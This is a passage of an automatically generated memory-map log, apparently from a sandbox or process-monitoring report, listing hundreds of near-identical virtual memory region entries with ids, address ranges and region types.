0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2287 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2400 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2401 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 2402 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 2403 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 2404 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2405 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2406 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2407 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2408 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2409 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2410 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2411 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2412 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2413 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2414 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2415 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2416 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2417 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2418 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2419 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2420 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2421 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2422 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2423 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2424 start_va = 0x2a0000 
end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2425 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2426 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2427 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2428 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2429 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2430 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2431 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2432 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2433 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2434 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2435 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2436 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2437 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2438 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2439 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2440 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2441 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2442 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2443 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2444 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2445 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2446 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2447 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2448 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2449 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 2450 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2451 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2452 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2453 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 2454 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 2455 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 2456 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2457 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2458 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2459 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2460 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2461 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2462 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 2463 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2464 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2465 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2466 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2467 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2468 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2469 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2470 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2471 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2472 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2473 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2474 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2475 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 2476 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2477 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2478 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2479 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2480 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2481 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2482 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2483 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2484 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2485 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2486 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2487 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2488 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2489 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2490 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2491 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2492 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2493 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2494 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2495 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2496 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2497 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2498 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2499 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2500 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2501 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2502 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2503 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2504 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2505 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2506 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2507 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2508 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2509 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2510 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2511 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2512 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2513 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2514 start_va = 0x2a0000 end_va = 
0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2627 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2628 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 2629 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 2630 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 2631 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2632 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2633 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2634 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2635 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2636 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2637 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2638 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2639 start_va = 
0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2640 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2641 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2642 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2643 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2644 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2645 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2646 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2647 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2648 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2649 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2650 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2651 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
2652 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2653 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2654 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2655 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2656 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2657 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2658 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2659 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2660 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2661 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2662 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2663 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2664 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = 
"" Region: id = 2665 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2666 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2667 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2668 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2669 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2670 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2671 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2672 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2673 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2674 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2675 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2676 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2677 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 2678 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2679 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2680 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 2681 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 2682 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 2683 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2684 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2685 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2686 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2687 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2688 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2689 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2690 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2691 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2692 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2693 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2694 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2695 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2696 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2697 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2698 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2699 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2700 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2701 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2702 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2703 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 
